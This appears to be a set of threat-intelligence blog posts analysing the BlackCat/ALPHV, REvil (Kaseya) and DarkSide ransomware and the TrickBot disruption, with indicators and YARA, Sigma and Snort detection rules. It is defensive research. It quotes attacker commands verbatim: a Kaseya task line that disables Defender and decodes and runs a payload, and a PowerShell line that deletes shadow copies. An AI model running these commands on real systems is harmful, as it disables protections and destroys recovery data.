BlackCat / ALPHV is known for high-profile attacks like those conducted against the italian luxury brand Moncler, the aviation company Swissport and more recently against GSE (Gestore Servizi Energetici SpA). The ransomware payload includes a lot of advanced features and is able to support a wide range of offensive operations and to impact different environment . It’s command-line driven and human-operated with the ability to use different encryption routines, spread between devices, and kill hypervisors. The collective appeared in early December 2021 announcing the start of its activities in DDW (Deep / Dark Web) forum. It’s a group very well integrated in the criminal community and among its affiliates there are probably a lot of experienced individuals in the panorama of ransomware operations as coming from cartels that over the time have dismantled their activities. In this regard, it is quite probable that the collective has, at least in part, benefited from the closure of the Conti cartel as some former elements of the latter have certainly chosen to join the BlackCat / ALPHV project, probably maintaining accesses, tools, victims matrix and visibility acquired within the previous “brand“.

BlackCat / ALPHV R-a-a-S model consists of multiple players:

  • Access Broker (Engaged to provide first access to victim networks)
  • RaaS Operators (Responsible for the development of tools and infrastructures to support the cartel)
  • RaaS Affiliates (Responsible for operations within the affected networks. They deploy the ransomware payload, exfiltrate data and move laterally; usually not in this order ;])

Since this collective is therefore based on a plethora of different affiliates (as common with others similar criminal organizations), the ways in which a BlackCat / ALPHV payload could impact an infrastructure vary greatly depending on the affiliate who delivered it. Initial access methods may also differ; some intrusions, for example, have seen the exploitation of leaked credentials, misconfigured or vulnerable VPN concentrators, exposed RDP services, or Exchange server vulnerabilities.


As already said, BlackCat / Alphv is one of the first ransomware developed in the RUST programming language (by using this language problably the attackers tried to increase the chances to remain undetected and, by leveraging this programming language, operators are able to easily compile it against various operating system architectures.) Based on some personal considerations deriving from the analysis of some samples, I can say that it was written by very experienced malware developers. This malware can impact Windows / Linux devices and VMWare instances and has been developed with extensive capabilities, including self-propagation ones configurable by the attackers in order to align with the variables of the environment in which it operates. It’s based on a combination of Salsa20/AES and RSA in order to perform the cryptographic operations. This malware family quickly has achieved high levels of notoriety for its sophistication and innovation but also because the operators of the RaaS allowed the affiliates to withhold very high percentage for each ransomware payment (up to 90%). The combination of a payload written from scratch in an uncommon language as well as aggressive “market” offers (and very advantageous for affiliates) have allowed this project to immediately carve out a good slice of users.


BlackCat / APLHV victims  include organizations operating in at least the following sectors:

  • Technology
  • Industry
  • Transportation
  • Pharmaceutical
  • Energy
  • Telco
  • Automotive
  • Retail

Usually the gang adopts a rather aggressive approach in handling the information stolen from victims and in relations with them; this is likely to increase the chances of obtaining the required payments. The ransoms usually run in the millions of dollars, but the gang has often accepted payments far less than initially requested.


BlackCat / Alphv has been observed to look for affiliates and pentesters via well-known cybercrime forums. Affiliates, as already stated, can keep up to the 90% of the ransom payment, while the rest goes to the BlackCat/Alphv operators. Every affiliates and collaborators are interviewed (sometime more than once) and vetted before being accepted into the collective. If the affiliate is accepted, it is granted a login to a Tor-based control panel that hosts the affiliate’s space. This TOR-based web portal is completely written in Russian and is used by operators to share update, announcements, tips, tutorial about how to use the BlackCat / Alphv ransomware and information relating to the victims with the affiliates.


It is not easy to pinpoint the geographic distribution of BlackCat / Alphv affiliates. Some of them have been observed to distribute other payloads in parallel (such as, for example, Hive) and therefore do not have an exclusive affiliation. However, most of them are believed to operate from Russia and Eastern Europe. The project, as far as the origins are concerned, was born from a rib of what was ReVil (dismantled by an FSB raids in early 2022). However, it is interesting to note how the former ReVil‘s operators have tried to move away from it in building the new BlackCat / Aphv, avoiding making some mistakes of the past, creating a new ransomware from scratch and encouraging policies aimed at solving the some common problems that are affecting these cartels, such as that the ever-increasing detection capabilities of common attack tools the affiliates are used to rely on such as Mimikatz and CobaltStrike.


BlackCat is an sophisticated ransomware cartel that can count on an highly customized and personalized payload. By using the RUST programming operators are able to compile it easily against various operating system architectures which facilitates the group’s ability to switch between victims and adapt the payload against different environment. BlackCat/Alphv operates under a R-a-a-S model and uses multiple extortion techniques. It is composed of several affiliates, some of which have been observed delivering payloads other than BlackCat / Alphv’s, such as, for example, Hive. Some of these affiliates have previous experience with others groups, such as BlackMatter and Conti.


Revil / Sodinokibi ransomware delivered through Kaseya VSA supply-chain attack

On July 2, 2021, Kaseya issued a notice stating that the company was experiencing a potential cyber attack against the VSA suite. The company itself advised that the on-prem customers servers should be shut down immediately until further notice from them.

VSA is a very common solution and usually used by Managed Service Providers especially in the United States and the United Kingdom. It allows to perform patch management and client monitoring for MSP customers.

From the first reconstructions of the incident, a threat actor caused the spread of malicious code together with alleged updates performing a s.c. supply-chain attack. The delivered malicious code is capable of copying a malware dropper (digitally signed with a valid signature from PB03 TRANSPORT LTD.) of the Revil / Sodinokibi ransomware on the affected systems.

As per evidence extracted, this dropper (sha1: 5162f14d75e96edb914d1756349d6e11583db0b0) has the purpose of creating two distinct files under the path C:\Windows\ . Although not common practice among malware writers, this path is hard-coded within the executable.

The creation of the aforementioned files has the purpose of side-loading a malicious dll (sha1: 656c4d285ea518d90c1b669b79af475db31e30b1) within a legitimate copy of the Microsoft Windows Defender executable (MsMpEng.exe). As soon as the latter is launched, the file encryption phase is therefore carried out through a legitimate process, complicating the detection operations.

Both payloads are retrieved by referencing two resources within the dropper, as shown in the following image

Side-Loaded DLL

The loaded dll into the legitimate Windows Defender executable is intended to perform the actual file encryption operations. The malicious Revil / Sodinokibi payload is originally retrieved after an useful key for this process is dexored at sub_10001110. The DLL exports several function: ServiceCrtMain, ServiceMain, SvchostPushServiceGlobals as evidences reported

ServiceCrtMain is the one of our interest as it is responsible for initiating the logic of retrieving and executing malicious instructions

The payload is then mapped as file into the created thread through CreateFileMappingW and MapViewOfFile.

File mapping is commonly used in order to load into memory a file and permits malware writers to manipulate it easily. CreateFileMapping function is useful to load a file into memory while MapViewOfFile function returns a pointer to the base address of the mapping. The payload is then executed. Following is reported the implant configuration file as it has been extracted in its original form:


Propagation and Related Risks

Supply chain attacks perpetrated with the aim of targeting new victims is something we are not used to see in a ransomware-related incident. This one appears however to have a big impact and certainly opens to considerations about the devastating new trend in cybercrime to study and focus on a single target only to hit hundreds or thousands of them. What must definitely be considered in this event is that the first targets are MSPs (Managed Service Providers) because, by hitting them, the attacker has the potential to further spread malicious payloads even towards their customers.


Managed Service Providers located at least in the following countries: US, DE, UK, IE according to the visibility I can dispose of at the time of writing. MSPs are generally to be considered a strategic target as they offer a direct channel to reach many other potential targets (the same MSP customers).

Indicators of Compromise / Linked Artifacts

updatename: Kaseya VSA Agent Hot-fix

filePath: c:\kworking\agent.exe

filePath: c:\kworking\agent.crt

Task commandline: C:\WINDOWS\system32\cmd.exe” /c ping -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

md5: 561cffbaba71a6e8cc1cdceda990ead4

sha1: 5162f14d75e96edb914d1756349d6e11583db0b0

sha256: d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e

md5: a47cf00aedf769d60d58bfe00c0b5421

sha1: 656c4d285ea518d90c1b669b79af475db31e30b1

sha256: 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd



The following rule can be useful to identify the Revil / Sodinokibi dropper

rule REvil_Dropper_827322_000001 {
description = “Detects REvil/Sodinokibi dropper as observed in Kaseya supply-chain attack”
author = “Emanuele De Lucia”
reference1 = “”
reference2 = “”
date = “2021-07-02”
hash1 = “d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e”
$ = “MpSvc.dll” fullword ascii
$ = “MsMpEng.exe” fullword wide
$ = “Antimalware Service Executable” fullword wide
$ = “MsMpEng.pdb” fullword ascii
$ = “SOFTIS” fullword wide
$ = “MODLIS” fullword wide
condition: uint16(0) == 0x5a4d and all of them


A possible way to get a first degree of visibility into potential events related to such threat could be to detect how the adversary tries to disable the defenses of the victim system (T1562). In particular, this allows us to observe events in which the adversary successfully disabled Windows Defender through powershell message

Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | where {($_.message -match “.Set-MpPreference.” -and $_.message -match “.-DisableRealtimeMonitoring $true.” -and $_.message -match “.-DisableIntrusionPreventionSystem $true.” -and $_.message -match “.-DisableIOAVProtection $true.” -and $_.message -match “.-DisableScriptScanning $true.” -and $_.message -match “.-EnableControlledFolderAccess Disabled.” -and $_.message -match “.-EnableNetworkProtection AuditMode.” -and $_.message -match “.-Force -MAPSReporting Disabled.” -and $_.message -match “.-SubmitSamplesConsent NeverSend.”) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message



Ransomware: Survival vs Kill Chain.

What we today define “ransomware” at the beginning were basically screen lockers demanding a ransom from the victim (“Your PC contains illegal content and cannot be used …“).

In relation to the increasing revenues they are able to generate, in recent years they have become one of the fastest growing classes of malicious software in the cyber threat landscape.

Lately, moreover, almost all of the interventions and articles on “cyber” topics were related to this category of malware as a result of a specific attack against Colonial Pipelines Inc. which caused countless economic losses and inconveniences of any kind in the States.

In face of first rivers of ink spilled on the incident itself and then on the group responsible for the attack (- note it was one of the group’s affiliates and not the same dev team of the #DarkSide ransomware -) they are not missing, here and there, articles / advice / posts by experts on how to defend against this type of malware.

The plethora of suggestions given, however, in my opinion have rarely been placed within a strategic context and almost always indicated as a list of specific actions to be performed.

The individual items of these lists, although singularly impeccable from a theoretical point of view (such as “installing a good antivirus” and “applying risk management processes“), can be difficult to apply in practice if not placed in a well-defined context that pursue a specific purpose; this purpose should the contrast and mitigation of extortion-oriented attacks and much more generally the enhancement of one’s defensive capabilities.

Finally, considering the famous phrase – “It is not possible to be 100% protected from malicious code” – it is also clear that a valid defensive solution cannot be based exclusively on the adoption of the latest AV / EDR technologies (more or less sophisticated) nor much less on tricks and / or tips of the last minute.

Survival Skills:

Implementing a good defense program against these threats is undoubtedly an active and continuous process over time that involves the strengthening of at least five (5) internal capabilities.

They are:

Prevention: prevent the exploitation of infrastructure weaknesses and / or vulnerabilities through processes for updating, hardening and control of public information (social networks, public managers / employees profiles, job descriptions …) Technically speaking, in some cases, prevention could also mean adopting alternative technologies to those already in place and normally used, for example, for remote access services (VPN / RDP) in order to totally eliminate the growing risks due to the greater attention of criminal groups against them (0day research, 1 day exploit and theft / sale of access credentials on clearnet / darknet). Their potential compromise, in fact, could be catastrophic for the environment to be protected and provide an advantage that is difficult to recover on a defensive level as these services are often designed to interface directly with corporate intranets.

Detection and Protection: represents the ability to protect your assets from potentially adverse events by acquiring the ability to detect and contain a threat. As for the malicious code, the protection of your assets certainly includes the adoption of an AV / EDR, execution prevention systems, sandboxes etc.etc.

Resistance: indicates the ability to face and / or minimize the effects of an unknown or particularly stealthy threat and which has a high possibility of representing a concrete risk. It involves the implementation of concepts such as the separation of environments, the reduction of the potential attack surface, the identification of critical services and more stringent access control to them, etc. etc.

Resilience: indicates the ability to recover after an accident. Knowledge (SA – Situational Awareness): it means clearly understanding what to defend against in relation to our perimeter as well as the tactics and procedures implemented by the opponents and the consequent adoption of a defense strategy.

Knowledge (SA – Situational Awareness): it means clearly understanding what one must defend against in relation to our perimeter as well as the tactics and procedures implemented by the adversaries and a consequent adoption of a defense strategy.

Ransomware…pays off:

The Covid-19 pandemic has been very useful for the “ransomware” business. In general the higher revenues of many criminal groups (tripled, according to some estimates, compared to the pre-covid period) are due to the inability of many organizations to adapt to a de-centralized work model after a large percentage of their the workforce begun to operate outside a defined perimeter (the classic corporate one).

However, in many cases, it should be noted that the extension of the attack surface as a direct consequence of the new “smart-workers” not actually created a “new” problem from scratch but has often magnified one that was present even previously. This problem is mainly due to the lack of equipment (not only in the technological field but also in the procedural and internal policies ones) with which many companies fight these threats.

The most typical and widespread weakness observed during the analysis of some incidents was to focus (or limit) these defense on few points compared to the five (5) listed above. Closely related to what the “classic” cyber-security industry proposes, very often the one and only line of defense is delegated to AntiVirus / EDR and “Monitoring Operations“, thus concentrating all the contrast strategy in the already described capacity of “Detection and Protection“.

In consideration of the fact that even the most modern anti-malware solutions available on the market cannot guarantee detection rates even close to 100% (without considering the context on the basis of which an adversary arrives to operate within our perimeter) itìs evident that relying exclusively on them may not be enough.

Survival vs Kill Chain:

All the intrusions that arrive at a ransom request have effectively closed the so-called “Kill-chain”. The kill-chain virtually represents a series of steps (or rings), precisely, concatenated, and in general, simplifying, they are:

1. Information gathering

2. First access and early-stage payload delivery

3. Lateral movement

4. Late-stage payload delivery

Closing this chain often means, for the victim, having to pay an expensive ransom to get back its data and documents. An effective contrast strategy will therefore provide for the direct mitigation of the potential risks deriving from each single phase (or ring) of this kill-chain, directing, with a more strategic vision, one’s work towards the five (5) points identified before.

Information Gathering: In this phase, attackers seek and hunt potential victims by acquiring information about them. While only some time ago the approach to choice seemed to be quite casual and a direct consequence of the general external posture of the organization to hit (in the sense that robbing a shop is generally easier than robbing a bank) now the trend seems to be moving towards a much more targeted decision, so as to be able to ask for very substantial ransoms once the operation succeed. Under the heading of “Prevention“, fall the set of activities aimed at not exposing the side to such attacks by trying to contain the information released (voluntarily or not) on social networks and public profiles of the company. In this regard, Security Awareness programs are particularly useful. Information sources (threat intelligence) designed to increase the levels of Situational Awareness of the staff in charge of network protection can also be particularly useful.

First Access / Early-Stage payload delivery: In this phase, the attacker is able to obtain a first access to the perimeter. In order to make their life as difficult as possible it is necessary to correctly apply hardening and patching programs to the systems. Technically limiting the potential attack surface, applying multiple authentication systems, blocking the execution of macros and scripting languages ​​that are not strictly necessary, checking permissions, logically limiting the communications of internal workstations are all useful factors for an Incident Prevention strategy. If the attacker still manages to deliver a first-stage payload and therefore to obtain a first access to our infrastructure, the adoption of policies aimed at obtaining greater visibility regarding what is happening (for example: alerts on login credentials anomalies, alerts on changes to accounts in the AD – Active Directory -, alerts on malicious DNS resolutions, alerts on network flow anomalies – Firewall Logs -, alerts on IDS / IPS events and so on…) is useful to strengthen our Detection and Protection skills. EDR / AV and SIEM support these skills as well.

Lateral movement: In this phase, the attacker managed to effectively compromise one or more machines inside our infrastructure and aims at expanding his/her control. If the defenses put in place up to now have proved ineffective, a further protective barrier capable of mitigating what is in place could be represented by the application of strong network segmentation policies of the environments. A further critical factor that can significantly increase our Resistance skills is the application of Behavior Analytics Systems.

Late-stage payload delivery: If the strategies applied so far have proved particularly ineffective in combating a so advanced and persistent adversary, we could suffer the effects of the last phase of a ransomware-kill-chain, that is the release of the last stage payload, the one that will probably be in charge of encrypting our data and information. Most likely the attacker already got the full control of several internal machines and probably also obtained “admingrade” credentials. Based on my personal experience, therefore, if we are at this point there is little chance that the Detection and Protection systems can effectively mitigate the course of events. The best defense at this point is to have a good backup of all data, files, applications and any other critical resources. These backups must obviously be isolated from other systems.


The ransomware business is particularly profitable. Considering the revenues it generates, it’s possible to assume possible to assume much more frequent and sophisticated attacks. The application of defensive measures in the various stages of the kill-chain, however, can reduce the risk of a full data loss (and to rely exclusively on negotiations with criminals to recover them).


Affiliates vs Hunters: Fighting the “DarkSide”

This content was originally written by me for SOC Prime, Inc. You can view the original article with detection rules here or read on for a local version.


On August 2020 a new type of malware, belonging to the Ransomware category, appeared in the cyber threat landscape. Threat actor responsible for its development called it “DarkSide” and , like others piece of malware of this type, is operated in Big Game Hunting (BGH) campaigns. Around more or less the same time, a DLS (Dedicated Leak Site) was made available on the darkweb (behind the TOR network) in order to report the first victims.

On their DLS, DarkSide operators claimed to be experienced in conducting cyber operations, having previously used other , not better identified, ransomware variants. Indeed, some characteristics of their operations support the hypothesis that the group could be a former affiliate of some other R-a-a-S (Ransomware as a Service) program that chosen to write their own ransomware likely to avoid sharing the profits of criminal activities with third parties.


DarkSide is a well-written malware family not much changed if compared to the first versions analyzed. Usually the samples belonging to this family present, as already reported in other technical tearticles, some functionalities aimed at making the analysis more harder. Indeed, in a recent sample (sha256:17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61), at 0040182A we find a sub aimed at dynamically resolving DLLs and API through LoadLibrary / GetProcAddress. sub_4016D5, sub_4013DA and sub_401AC3 are also involved in this process. The following screenshot shows a chunk of code extracted from the whole function designed for this purpose:

This can be an useful place to create a code-chunck based Yara rule aimed at hunting further variants of the same malware family. After having selected two representative chuncks we can obtain something similar to the following:

rule DarkSide_Ransomware_827333_39928 : CRIMEWARE {
author = “Emanuele De Lucia”
description = “Detects possible variants of DarkSide ransomware”
hash1 = “17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61”
call 0x4016d5
push esi
call 0x408195
mov ebx, eax
push dword ptr [esi – 4]
push esi
call 0x4013da
mov eax, dword ptr [esi – 4]
lea esi, [esi + eax]
mov ecx, 0x23
$ = { E8 [4] 56 E8 [4] 8B D8 FF 76 ?? 56 E8 [4] 8B 46 ?? 8D 34 06 B9 ?? ?? ?? ?? }
any of them

Darkside employs also techniques for privilege escalation and UAC (User Access Control) bypass. The technique observed in this case is known as CMSTPLUA UAC Bypass and exploits the ShellExec function by CMSTPLUA COM interface {3E5FC7F9-9A51-4367-9063-A120244FBEC7}. This allow to start a process with elevated permissions, according to the following graph:

Powershell is used in order to delete shadow copies preventing the recovery of previously backed up files through them according to the following syntax:

powershell -ep bypass -c
.Substring(2*$_,2))};iex $s”
Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}

In this case, a quick Sigma rule, can be employed in order to hunt for similar systems-side behaviors.

title: Detects possible DarkSide infection through PowerShell cmdline used to delete Shadow copies
status: stable
description: Detects possible DarkSide infection through PowerShell cmdline used to delete Shadow copies
author: Emanuele De Lucia
– internal research
– attack.t1086
– attack.t1064
date: 2020/12/01
category: process_creation
product: windows
– ‘\powershell.exe’
– ‘(0..61)|%%{$s+=[char][byte]’
– ‘4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20’
condition: selection
level: high

Before executing the main payload, the sample performs several other activities like information gathering (f.e. get Disks Info)

This image has an empty alt attribute; its file name is immagine-2.png

and a comparison of system services with a predefined list to stop those services that could affect the file encryption process

The following are the services malware looks for:


These areas can likewise be considered in order to extract bad-known pieces of code:

rule DarkSide_Ransomware_827333_39929 : CRIMEWARE {
author = “Emanuele De Lucia”
description = “Detects possible variants of DarkSide ransomware”
hash = “17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61”
push 0x10020
push dword ptr [edi]
push dword ptr [ebp – 4]
call dword ptr [0xcf0e66]
mov dword ptr [ebp – 8], eax
cmp dword ptr [ebp – 8], 0
je 0xce4d83
push 0x1c
lea eax, [ebp – 0x30]
push eax
call 0xce13da
lea eax, [ebp – 0x30]
push eax
push 1
push dword ptr [ebp – 8]
call dword ptr [0xcf0e6a]
push dword ptr [ebp – 8]
call dword ptr [0xcf0e6e]
$ = {68 [4] FF 37 FF 75 ?? FF 15 [4] 89 45 ?? 83 7D [2] 74 ?? 6A ?? 8D 45 ?? 50 E8 [4] 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 [4] FF 75 ?? FF 15 ?? ?? ?? ??}
any of them

After the encryption phase, Darkside is designed to communicate to its command and control server in order to share details relating to the victim (victimID) as well as further parameters useful for recovering encrypted files and identifing the affiliate. Most probably these network capabilities have been added in order to support the R-a-a-S model. In the analyzed sample, the CnC (Command and Control) is attested over the domain name Detecting network activities potentially related to this threat could therefore involve writing SNORT rules similar to the following:

alert udp $HOME_NET any -> any 53 (msg:”DNS request for a blacklisted domain ‘'”; content:”|0f|securebestapp20|03|com|00|”;nocase; reference:url,; sid:[SID HERE]; rev:1;)

This domain name has been created on 16/09/2020 and, according to my visibility, at time of writing it has an history of two (2) A record associated. The interesting one is linked to the IP Could be interested to note that the pDNS count value for this domain name from 21/09/2020 (day of first observed resolution to to 05/01/2021 (day of last observed resolution to is less than 180 and that most of them occurred from early November until today. This suggest a growth of the spread and obviously of the R-a-a-S business as well. In general, moreover, this number is also consistent with the low overall volume of DarkSide campaigns observed at least until mid-November 2020. This is further confirmed by the payload-side visibility I can dispose of for this malware family. Following are shown detection hits for DarkSide malfamily up to December 2020:

Welcome to Darkside

On 11/10/2020 a user posted an announcement titled “[Affiliate Program] Darkside Ransomware” on a Russian-speaking darkweb forum. The text contained in that post officially started the project’s affiliate program. Press articles has been used in order to advertise the program itself as well as the skills of the group that are “aimed only at large corporations” as originally posted by threat actor itself:

In the affiliate program are not welcome, among others, English speaking personalities, employees of the secret service, security researchers, the greedy (at least so I seem to understand) etc.etc.

There are, moreover, some rules to be respected, like avoiding to target entities within countries belonging to the CIS (Содружество Независимых Государств), including Georgia and Ukraine, or those operating in education, medicine, public and non-profit sector.

As you might imagine for any other job, there is a selection to go through in order to be included in the program. This includes an interview to check the candidate’s skills and experiences, such having been affiliated with some other program previously.

The group offers a Windows and Linux version of DarkSide ransomware plus an admin panel, a leak site and a CDN system for data storage.

So, do you have ESXi ?

At the end of November 2020, a Linux variant (ELF64) of DarkSide ransomware was uploaded to a well-known online malware repository. It had a detection rate, at the time of upload, practically non-existent. Even at time of writing (Jan 2021) the detection rate is very low (2/63). It seems to have a quite different purpose respect to the Windows counterpart. While the latter is born to encrypt all user files on a workstation (documents, images, PDFs and so on…), the Linux version has been created to damage virtual machines on servers. Indeed, the samples looks for extensions related to VMWare files like .vmdk, .vmem, .vswp and generic logs formats.

The ransom note is similar to the Windows one

and the output of the executable, once launched, confirms the focus on ESXi environments

as /vmfs/volumes/ is the default location of ESXi virtual machines.

A strict Yara rule similar to the following can help in identifying Linux variants of DarkSide :

rule DarkSide_Ransomware_827333_39930 : CRIMEWARE {
author = “Emanuele De Lucia”
description = “Detects possible variants of Linux DarkSide ransomware variants”
hash1 = “da3bb9669fb983ad8d2ffc01aab9d56198bd9cedf2cc4387f19f4604a070a9b5”
$ = “vmdk,vmem,vswp,log” fullword ascii
$ = “XChaCha20” fullword ascii
$ = “Partial File Encryption Tool” fullword ascii
$ = “main.log” fullword ascii
(uint16(0) == 0x457f and all of them)

Also for the Linux version, communications to the outside world take place through the same domain name previously reported and a specially crafted URL for each victim. Through Sigma it’s possible to write rules aimed at detecting DNS resolution requests to domain name where actually the command and control is attested:

title: Detects resolution requests to DarkSide Command and Control domain name
status: stable
description: Detects resolution requests to DarkSide Command and Control domain name
author: Emanuele De Lucia
date: 2020/12/01
– attack.t1071.001
category: dns
– ‘’
condition: selection
– internal research
level: high

Adversary Profile

From mid-November 2020, following the affiliation program, it’s currently more difficult to associate the exclusive use of DarkSide ransomware to a specific threat actor. However, some similarities with Revil suggest that its developer may be familiar with this solution until speculating that it may be from a former Revil affiliate who, to have more control over the operations and not to divide the profits, launched his own project, further enhanced by an independent affiliate program.

Regardless the specific actor behind the operations, DarkSide can be delivered via several vectors usually after gathering information about the target. According to my visibility, at least one threat actor who used DarkSide adopted the phishing technique (T1566) in order to deliver a first-stage payload whose exploitation finally allowed the distribution of DarkSide variants within the victim environment. Other intrusion techniques involve exploiting vulnerabilities in exposed applications (T1190) in order to get a first foothold from which to perform lateral movements.


T1190AccessAdversaries may attempt to take advantage of a weakness in an Internet-facing application using software, data, or commands in order to cause unintended or unanticipated behavior.
T1566AccessAdversaries may send phishing messages to gain access to victim systems.
T1059.001ExecutionAdversaries may abuse PowerShell commands and scripts for execution.

ExecutionAdversaries may abuse VBS scripts in order to perform tasks on the victim’s machine.
T1548.002Privilege EscalationAdversaries bypass UAC mechanisms to elevate privileges on system.
T1218.003Defense EvasionAdversaries abuse CMSTP to proxy execution of malicious code.
T1140 Defense EvasionAdversaries uses obfuscated files or information to hide artifacts of an intrusion from analysis.
T1083DiscoveryAdversaries enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
T1057DiscoveryAdversaries attempt to get information about
running processes on a system.
T1071.001Command and ControlAdversaries may communicate using application layer protocols associated with web traffic.
T1486ImpactAdversaries encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.
T1489ImpactAdversaries stop or disable services on a system to render those services unavailable.

Indicators of Compromise



The mystery of “” : A trick against “TheTrick”

Behind the scenes

TheTrick” is one of the community names with which we can refer to a criminal group that is responsible for the development and distribution of many malware variants, among wich “TrickBot“, “Ryuk“, “Conti“, “BazarLoader” and “BazarBackdoor“.

However, the malware vector mainly used by this adversary is certainly “TrickBot“. TrickBot is a modular piece of malware designed to allow for the inclusion of different malicious features to a starting base. This feature makes it capable of carrying out a lot of activities such as downloading and executing additional payloads, data harvesting, reconnaissance of the victim’s local network, lateral movement etc. etc.

According to visibility of my research group, however, starting from 22 September 2020 someone tried to disrupt the TrickBot botnet pushing a new configuration file to infected hosts that reported the IP address “” as new command-and-control server. is the “localhost” and obviously it’s not routable.

Beyond this, the “version” reported in this bogus file has been set to a value probably used to prevent bots from downloading a new valid configuration.

At first it was impossible to know if this configuration file was pushed voluntarily by the threat actor itself [very unlikely], by white hats attempting to disrupt the botnet, by a security vendor or by some government unit.

Until the configuration is returned to its prior state, TrickBot infected machines have been be unable to communicate with the true TrickBot command-and-control servers. However, what was well understood within my research group (while trying to understand what was happening) is that the entity that was attempting to destroy the TrickBot network had a very good knowledge about the “internals” of this threat.

Finally, on 09 October 2020The Washington Post revealed the mystery by reporting that the TrickBot disruption was the work of U.S. Cyber Command.

Botnet dismantled ?

For now it seems “No”. However, most likely this operation was not aimed at dismantling the Trickbot network permanently but instead at “…distract the adversary for at least a while as they seek to restore their operations…”. This is probably because “…the action was a bid to prevent Trickbot from being used to somehow interfere with the upcoming presidential election…”

Plausibly, operators behind TrickBot network already begun the full recovery of their network and losses. In addition, one of the potential counter-moves that the threat actor could put in place as retaliation for what happened could be an increase in money demands during ransomware-based operations.

In general, the threat landscape associated with this threat actor appears currently very lively. For example I recently came across a variant of Ryuk ransomware (associated with that group’s criminal ecosystem) compiled on September 11, 2020, suggesting a return of this after its development seemed to have been abandoned with the advent of “Conti“.

Very recently, moreover, another malware associated with the same criminal ecosystem, called BazarLoader, has been spread with practical no detection rates. Again I came across and reported on Twitter a variant of them with a detection rate of just 1/69 replying to a @James_inthe_box tweet. (

All of this to confirm that the group still seems very active and determined in their operations.

UPDATE: 12/10/2020

Microsoft, with the help of several ISPs around the world, took the TrickBot network down. Participants to operation obtained a court order to take down the TrickBot command and control servers thus avoiding poisoning the control and management mechanisms of agents.